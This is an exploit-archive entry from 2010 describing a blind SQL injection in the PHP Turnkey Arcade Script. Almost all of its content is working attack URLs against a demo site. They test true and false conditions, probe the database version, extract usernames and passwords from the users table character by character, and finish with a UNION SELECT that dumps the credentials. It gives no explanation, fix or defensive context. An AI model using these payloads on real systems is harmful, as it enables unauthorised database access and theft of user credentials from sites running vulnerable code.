Turnkey Arcade Script Blind SQL Injection Vulnerability

2010-02-12T00:00:00
ID 1337DAY-ID-10862
Type zdt
Reporter Red-D3v1L
Modified 2010-02-12T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================================
Turnkey Arcade Script Blind SQL Injection Vulnerability
=======================================================

    [?] Script:               [ Turnkey Arcade Script ]
    [?] Language:             [ PHP ]
    [?] Founder:              [ Red-D3v1L ]

########################################################################
   
===[ Exploit SQL Blind ]===

   
[ ]Exploit :


http://www.turnkeyarcade.com/demo/index.php?action=browse&id=7%20and%201=1 << this true

http://www.turnkeyarcade.com/demo/index.php?action=browse&id=7%20and%201=0 << this faulse


http://www.turnkeyarcade.com/demo/index.php?action=browse&id=7%20and%20substring%[email protected]@version,1,1%29=4  << this true


http://www.turnkeyarcade.com/demo/index.php?action=browse&id=7%20and%20substring%[email protected]@version,1,1%29=5 << this faulse


http://www.turnkeyarcade.com/demo/index.php?action=browse&id=7%20and%20%28select%20substring%28concat%281,concat%28username,0x3a,password%29%29,1,1%29%20from%20users%20%20limit%200,1%29=1

http://www.turnkeyarcade.com/demo/index.php?action=browse&id=7+UNION SELECT 1,2,concat(username,0x3a,password),4+from+users--


./Greetz For All my Frindes
==============================================================================




#  0day.today [2018-01-02]  #